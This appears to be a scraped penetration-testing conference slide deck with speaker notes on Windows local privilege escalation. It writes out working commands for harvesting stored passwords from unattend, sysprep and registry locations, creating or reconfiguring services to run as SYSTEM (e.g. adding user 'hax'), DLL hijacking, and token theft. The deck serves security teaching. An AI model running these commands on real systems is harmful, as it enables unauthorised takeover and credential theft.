Download presentation
Presentation is loading. Please wait.
Published byΘεόφιλος Τοκατλίδης Modified over 6 years ago
1
ENCYCLOPAEDIA OF WINDOWS PRIVILEGE ESCALATION
2
There are big differences between local priv esc on linux vs windows.
While they both share the standard amount of vulnerabilities, in our experience we are more likely to come across a fully patched windows server, than an up to date linux box. We did several linux host reviews, or pen tests that turned into host access, only to find out that the newly deployed servers were still lacking patches. One organisations “Standard Build” was only running at a 2010 patch level. .. Standard build The patch timeframes that we see on windows servers however, are much smaller which makes privilege escalation in Windows land a more challenging task.
3
Race condition/Symlink Crappy perl/python script Bad permissions
Linux Priv Esc Taviso LD_Preload SUID Binaries Race condition/Symlink Crappy perl/python script Bad permissions Priv esc on Linux is something that is ‘fairly’ common. Even if you don’t have a ‘Tavis in a box’ or find that the server is patched fully, there are usually other easily accessible avenues. Looking for Can usually find a SUID bin, and pop that through some common ways such as polluted parameters or environment settings. If neither of those methods pan out, can always fall back to a symlink or race condition type attack. And sometimes more likely is the badly coded admin/management scripts that run with higher privs. Nothing like using an admins own tools to own a box. If you look at any ‘commercial grade’ box that sits in a large organisation you will usually find a bunch of potential targets including things like what I just mentioend, as well as world readable/writeable files etc
4
Latest win32k.sys font bug metasploit:getSystem() No suid
Windows Priv Esc Taviso KiTrap0D Latest win32k.sys font bug metasploit:getSystem() No suid No env passing So what do we get in windows land. Again you can find yourself a Tavis, or wait for the next stuxnet release to be found. There are plenty of kernel parsing font bugs coming out at the moment. Which results in priv esc on an unpatched system being pretty straightforward, as long as you have the exploit. If metasploit is your thing, then one command will pop you a privileged shell However, on a fully patched box you won’t be finding any SUID binaries, and the environment ‘usually’ doesn’t get passed through to any services or high privilege processes. So where does this leave us?
5
Google(“Windows Privilege Escalation”)
How do you escalate your privileges? The process is quite simple actually; you need to get the system account to run a program that you can interact with. This is where the “at” command comes into play. The “at” command schedules a task as a specific time, unlike the “schtasks” command which runs a job under the account that scheduled it, the “at” command runs it as “SYSTEM”. Open a command prompt and type: at 13:01 /interactive cmd Windows pric esc has always been one of interest to me, its usually the 2nd stage of a compromise and in our business Domain Admin access to a network provides for a pretty good report. Googling for windows priv esc however sometimes turns up a new vulnerable driver IOCTL exploit, but in most of the hits it is posts like this one. Ok so yes it is privileged escalatio, from administrator to system, but come on... If I went to a linux hacker said, hey as root I can run a binary that runs as... Root, I pretty sure the penguin would say something like that. So is this really all we got for windows, you can priv esc from admin to system. HA HA! LAME!!111! Must Be In The Administrators Group
6
Google(“Windows Privilege Escalation”)
@echo off @break off title root Cls echo Creating service. sc create evil binpath= "cmd.exe /K start" type= own type= interact > nul 2>&1 echo Starting service. sc start evil > nul 2>&1 echo Standing by... ping n 4 > nul 2>&1 echo Removing service. echo. sc delete evil > nul 2>&1 Must Be In The Administrators Group YOUR PRIV ESC FU IS WEAK Here’s another example of the type of ‘native’ priv esc exploits we see for windows. This one’s even wrapped up in a batch file with comments. But again, And again its escalating from an already privileged account.
7
Google(“Windows Privilege Escalation”)
Stickykeys Replace C:\windows\system32\sethc.exe Logout Hit shift a bunch C:\program.exe Exploits apps that don’t wrap C:\program files\fubar => c:\program.exe Not since windows 2000 And some more examples, of how you do priv esc in the windows world. Replacing a binary in the system32 directory to achieve privilege escalation? That's not going to work from an unprivileged account. However saying that, I did use that technique recently to log into a box that I had forgotten the creds for, but I had physical access and that always wins. An advisory got published this year for an application that didn’t wrap the command line in quotes. And it went as far as saying that by default it is not possible for an unpriveleged users to write to the root of c: and create the program.exe binary. But IF the permissions had been messed up then it would be exploitable. Thats a pretty big IF.
8
Useful Windows Priv Esc
Explain some useful methods Citrix/RDP/Kiosk environments Local workstations, VDI’s etc Post exploitation Escalating privileges User => Higher user Network service => LocalSystem Admin => Domain Admin So the aim of this talk is to discuss some windows priv esc techniques that we have used in the past, and perhaps trigger something that will make you go away and come up with some new methods for the future. There are no 0days vulnerabilities released here, in fact there is no memory corruption occurring at all. Its just stock standard, these are the things to look for that may be helpful when you have that user shell in a citrix envinroment, or want to take over that workstation either yours or someone elses. We will discuss methods that can be used from user-> Etc...
9
Clear Text Credentials
Pure gold Install files, config files, admin notes c:\unattend.txt [GuiUnattended] AdminPassword=<CLEAR TEXT PASSWORD> AutoLogon=Yes AutoLogonCount=1 OemSkipRegional=1 OemSkipWelcome=1 ServerWelcome=No TimeZone=290 Unattended installations are used by OEM manufacturers as well as most outsource support vendors. This one came from a citrix job that I had to after hours once. I was rather glad that I got a cmd prompt in 5 minutes and a local administrator in 2 more. Took 5 more to get domain admin, and then I packed up and went home. RUNAS /U:LOCALADMIN CMD.EXE
10
Slightly more difficult c:\sysprep.inf [Clear Text]
BASE64(Credentials) Slightly more difficult c:\sysprep.inf [Clear Text] c:\sysprep\sysprep.xml [Base64] <AdministratorPassword> <Value>UABhAHMAcwB3AG8AcgBkADEAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBQAGEAcwBzAHcAbwByAGQA</Value> <PlainText>false</PlainText> </AdministratorPassword> MS Sysprep files hold passwords in an xml file, base64 encoded. Sysprep is the System Preparation Tool for automatic deployment and configuration of windows systems P a s s w o r d 1 A d m i n i s t r a t o r P a s s w o r d
11
findstr /si password *.txt | *.xml | *.ini VNC vnc.ini, ultravnc.ini
More Easy Passwords GrepFTW findstr /si password *.txt | *.xml | *.ini VNC vnc.ini, ultravnc.ini Easily decrypted Any FTP or other remote access client Most cached credentials can be decrypted Grep the drive for interesting bits, you will be surprised what comes out. FTP, MAIL, VNC clients, all have the ability to cache passwords. Most are easily decrypted and password recovery tools exist for many things, including internet explorer, .rdp files and everything stored in protected storage
12
\\HKCU\Software\ORL\WinVNC3\Password Autologin
Passwords In Registry VNC Again \\HKCU\Software\ORL\WinVNC3\Password Autologin HKLM\SOFTWARE\Microsoft\ Windows NT\Currentversion\ Winlogon Clear text credentials Shell key UserInit key Ther registry is another place that clear text or easily decrypted credentials can exist. VNC again would probably be encrypted in the registry, but there are numerous tools to decrypt these. Depending on the envinoment, (citrix/kiosk) you may find that the world readable autologin keys under the Winlogon branch to come in handy. These contain clear passwords for the account to auto login as. Why would this be useful?, well in the case where they can be reused against other servers in the environment, or if its a domain account, then it becomes handy quickly. And if Access to regedit is prohibited, and you haven’t upped your tool suite yet, then try the reg command line tool reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
13
HKLM\SYSTEM\CurrentControlSet\Services\SNMP\ Putty
Passwords In Registry SNMP Parameters HKLM\SYSTEM\CurrentControlSet\Services\SNMP\ Putty HKCU\Software\SimonTatham\PuTTY\Sessions Clear text proxy credentials reg query HKLM /f password /t REG_SZ /s | clip reg query HKCU /f password /t REG_SZ /s | clip While these keys are not strictly priv esc, they could reveal credentials that are reused, or at least provide some information on connected systems. A couple of easy search queries can reveal information quickly, and for those that haven’t used the clip command before its great for when you are working in citrix environments or the like.
14
Always check for GUI apps
GUI Attacks Windows XP/2003 Always check for GUI apps
15
GUI Attacks
16
Anything running as SYSTEM with a window
Shatter Attacks Windows XP/2003 Anything running as SYSTEM with a window Can be attacked from the command line Easy Wins Listview / Treeview RichTextBox EditBox Ruxcon 2004
17
Stuff like this still works Directory listing as SYSTEM
Shatter Attacks Stuff like this still works Directory listing as SYSTEM
18
Stuff like this still works Directory listing as SYSTEM
Shatter Attacks Stuff like this still works Directory listing as SYSTEM
19
Directory Permissions
Default Permissions C:\>cacls "Program Files" C:\Program Files BUILTIN\Users:R BUILTIN\Users:(OI)(CI)(IO) GENERIC_READ GENERIC_EXECUTE BUILTIN\Power Users:C BUILTIN\Power Users:(OI)(CI)(IO)C BUILTIN\Administrators:F BUILTIN\Administrators:(OI)(CI)(IO)F NT AUTHORITY\SYSTEM:F NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F CREATOR OWNER:(OI)(CI)(IO)F By default the directory permissions on system folders such as program files will prevent unprivileged users from writing. If this wasn’t the case then it would be fairly easy to overwrite a common binary and wait for another user/admin to log in.
20
When Installers Go Wild
Incorrect permissions Directly overwrite the binary C:\Program Files\Symantec\pcAnywhere\awhost32.exe Everyone:(OI)(CI)F NT AUTHORITY\SYSTEM:(OI)(CI)F C:\Program Files\Symantec\pcAnywhere\awrem32.exe Sometimes however, the installers don’t play properly.
21
On newly created directories
Default Permissions On newly created directories C:\>ver Microsoft Windows XP [Version ] C:\>cacls \testperms C:\testperms BUILTIN\Administrators:(OI)(CI)F NT AUTHORITY\SYSTEM:(OI)(CI)F VMXPSP2\Administrator:F CREATOR OWNER:(OI)(CI)(IO)F BUILTIN\Users:(OI)(CI)R BUILTIN\Users:(CI)(special access:) FILE_APPEND_DATA FILE_WRITE_DATA Although a standard user can’t write to the root of the drive, any newly created directory will automatically inherit the permissions shown above. As you can see, on Windows XP the Users group gets FILE_APPEND_DATA and FILE_WRITE_DATA to the newly created directory even though the OWNER is the administrator
22
On newly created directories
Default Permissions On newly created directories C:\>ver Microsoft Windows [Version ] C:\>cacls \testperms C:\testperms BUILTIN\Administrators:(ID)F BUILTIN\Administrators:(OI)(CI)(IO)(ID)F NT AUTHORITY\SYSTEM:(ID)F NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F BUILTIN\Users:(OI)(CI)(ID)R NT AUTHORITY\Authenticated Users:(ID)C NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C On Windows 7 a similar thing ocurs, however it is the AUTHENTICATED USERS that gets permissiosn. Any user that authenticates to the box automatically becomes a member of the AUTHENTICATED USERS .
23
On newly created directories
Default Permissions On newly created directories C:\testperms>echo testing > test.txt C:\testperms>dir /q Directory of C:\testperms 19/11/ :01 p.m. <DIR> hidden\Brett . 19/11/ :01 p.m. <DIR> NTSERVICE\TrustedInsta.. 19/11/ :01 p.m. hidden\testuser test.txt 1 File(s) bytes 2 Dir(s) 35,323,899,904 bytes free As you can see here, the directory is owned by me, and another user (testuser) can create a file in the directory. So how can this become a problem, and more specifically, how can this be used for priv esc.
24
Metasploit Bug File Permissions
On February 1st, Eduardo Prado of Secumania notified us of a privilege escalation vulnerability on multi-user Windows installations of the Metasploit Framework. The problem was due to inherited permissions that allowed an unprivileged user to write files in the Metasploit installation directory. Well when applications install themselves outside of a protected directory then files in that directory can be manipulated. Depending on permission, it may be possible to replace the binary directory, or to append data to a file (that is to overwrite the contents)
25
File Permissions This screenshow is from a stock windows 7 box, and we can see that the admin, who owns the directory, has created file. You would expect this to be safe from modification. However...
26
File Permissions This next screenshot shows the standard user, testuser, overwriting the admin owned file. No special tricks here, just badly set default permissions and permission inheritance.
27
Windows 7 Authenticated Users File Permissions
accesschk.exe -qwv \testperms\admin.txt RW NT AUTHORITY\Authenticated Users FILE_APPEND_DATA FILE_EXECUTE FILE_READ_ATTRIBUTES FILE_READ_DATA FILE_READ_EA FILE_WRITE_ATTRIBUTES FILE_WRITE_DATA FILE_WRITE_EA DELETE SYNCHRONIZE READ_CONTROL Here we can see the specific permissions granted for that file. It clearly shows that the AUTHENTICATED USERS group gets access rights such as FILE_APPEND_DATA, FILE_WRITE_DATA and DELETE.
28
AccessChk Find weak directories Find weak files Cacls / ICacls
Quick Discovery AccessChk Find weak directories Find weak files Cacls / ICacls accesschk.exe -uwdqs users c:\ accesschk.exe -uwdqs “Authenticated Users” c:\ accesschk.exe -uwqs users c:\*.* accesschk.exe -uwqs “Authenticated Users” c:\*.* AccessChk is a tool by sysintenrals. Can be used to quickly scour a system for permissions assigned to different users and user groups. So thats really helpful, as far as priv esc goes. If we can overwrite a binary (such as pcanywhere, or metasploit) and then wait for another user to log in, or coerce a domain admin to RDP into the box to fix our issue. Such as ... my pcanywhere no longer works.... But what about something more silent, let interactive. Considering that the admin probably isn’t going to respond to me calling him up and telling him I have compromised his server and can he come and check... Although that could work too. cacls "c:\Program Files" /T | findstr Users
29
Autoruns Enumerate Auto Runs
We want something that will run when another user logs in.. Userland trojans essentailly. Autoruns is another tool from sysinternals What we are looking for is an entry that points to a directory that we know has weak permissions. For example....
30
Autoruns Enumerate Auto Runs
Bginfo is a tool we sometimes see. Its used to display a background on the system stats etc.. Useful for admins when they forget what server they are on. We can see here that its running from the \bginfo directory, and we will assume that the default permissions apply, so authenticated users have access to create files in the direcrory.
31
Trojaning Autorun Checking out the permissions for the executable, it is clear that we can not replace the binary itself.
32
Trojaning Autorun But there are other ways to circumvent execution when you can create files in the running directory.
33
Procmon Trojaning Autorun
Loading procmon and monitoring the bginfo process, we are looking for a dll load from the current directory.
34
Trojaning Autorun The we create our attack dll, place it in the directory and then whenever bginfo is run (when anyone logs in) Yes they too can do some calculations while they wait.
35
Application DLL Searching
DLL Redirection Can specify the dll to use .local / .manifest Known DLLs cannot be redirected The common system dlls (KnownDLLs reg key) Search Path Path directories with weak permissions File doesn’t exist in system32 Other methods for dll replacement
36
AT – usually runs tasks as system Scheduled tasks – can run as user
Tasks And Jobs System tasks AT – usually runs tasks as system Scheduled tasks – can run as user Viewing tasks c:\windows\tasks c:\windows\system32\tasks Commands AT schtasks compmgmt.msc Find a task pointing to an insecure location Always pays to check out the scheduled tasks and jobs. If any of then point to a weak location then there is chance for priv esc, and as the tasks usuallly run as SYSTEM its a good win. We did a job when a job was set to run as a domain account, from a user account we could trojan the process...... Stuxnet Task Priv Esc
37
Missing files in writable locations C:\hp\services
Orphaned Installs Missing files in writable locations C:\hp\services If you are very lucky you may find an entry for a service or other hook that is not on the drive. If you can write to the expected location then you win. We recently had a job where a service was pointing into c:\hp\services, which had since been deleted. By recreating the structure we were able to inject a service into the system
38
AccessChk Find weak permissions Windows XP SP3 Services DcomLaunch
accesschk.exe –uwcqv * DcomLaunch RW BUILTIN\Administrators SERVICE_ALL_ACCESS RW BUILTIN\Power Users SERVICE_QUERY_STATUS SERVICE_QUERY_CONFIG SERVICE_CHANGE_CONFIG SERVICE_INTERROGATE SERVICE_ENUMERATE_DEPENDENTS READ_CONTROL Accesschk can be used to easily spot configured services with weak permissions. This one is from XPSP3, and gives POWER_USERS the ability to modify the service.
39
Windows XP SP1 Services SSDPSRV RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS RW BUILTIN\Administrators RW NT AUTHORITY\Authenticated Users upnphost These two from a few years back now were patched of course, but are included to show the type of permissions we are hoping for.
40
Permissions Services Permission Good For Us? SERVICE_CHANGE_CONFIG
Can reconfigure the service binary WRITE_DAC Can reconfigure permissions, leading to SERVICE_CHANGE_CONFIG WRITE_OWNER Can become owner, reconfigure permissions GENERIC_WRITE Inherits SERVICE_CHANGE_CONFIG GENERIC_ALL Permissions
41
Service control sc.exe Services C:\Tools>sc qc upnphost
[SC] GetServiceConfig SUCCESS SERVICE_NAME: upnphost TYPE : 20 WIN32_SHARE_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\WINDOWS\System32\svchost.exe -k LocalService LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Universal Plug and Play Device Host DEPENDENCIES : SSDPSRV SERVICE_START_NAME : NT AUTHORITY\LocalService How to take control
42
Service control sc.exe Services
sc config upnphost binpath= “net user hax /add” sc config upnphost obj= “.\LocalSystem” password=“” net stop upnphost net start upnphost Configure and start/stop
43
Other Permission Issues
Read and write sensitive keys NtGdiEnableEudc Exploit (MS11-011) Service Tracing key (MS10-059) (Read Cesars Work) Registry symlink vuln (MS10-021) Processes, Threads, Handles, Pipes, Shared memory Inject code into unsecured processes Steal process/thread tokens Hijack handles for write access Long pipes are long AccessChk Has syntax for checking most of these Other permission issues accesschk.exe /?
44
Requires SeImpersonatePrivilege ASPNET, IWAM_computername
Token Impersonation What is impersonation? The ability of a thread to execute using different a different security token Requires SeImpersonatePrivilege ASPNET, IWAM_computername Local Service, Network Service Token Reading Cesar Cerrudo – Token Kidnapping 1/2/3 (Churrasco) MWR InfoSecurity - Whitepaper Token impersonation
45
ImpersonateNamedPipe
@stake, Inc. Security Advisory Advisory Name: Named Pipe Filename Local Privilege Escalation Release Date: 07/08/2003 Application: Microsoft SQL Server Platform: Windows NT/2000/XP Severity: Local privilege escalation Has been around for a long time, its abuse of functionality not a vulnerability itself.
46
ImpersonateNamedPipe
Process With SeImpersonate Service Runing As LocalSystem IMPERSONATENAMEDPIPECLIENT() NOW RUNNING AS LOCALSYSTEM REQUEST TO CONNECT TO PIPE Named Pipe Called Mofo YES I AM A CONNECTING ARROW How it works.
47
Admin -> Domain Account
Incognito luke_jennings Standalone or Metasploit Finds usable delegation tokens Impersonate Snarf anyone's token from running processes Process Injection Administrator can hijack any users process Incognito
48
Admin -> Domain Account
WCE Improved ‘Pass The Hash’ Retrieves hashes from LSASS Modifies in memory current user hashes Steal once use many Grab a domain account hash and travel
49
Weak file permissions are rife IIS / Network Service -> SYSTEM
In Summary User -> Admin Can take a bit of time Weak file permissions are rife IIS / Network Service -> SYSTEM Totally doable Abused functionality rather than vulnerability Admin -> Domain Account Is what you want
Similar presentations
© 2025 SlidePlayer.com Inc.
All rights reserved.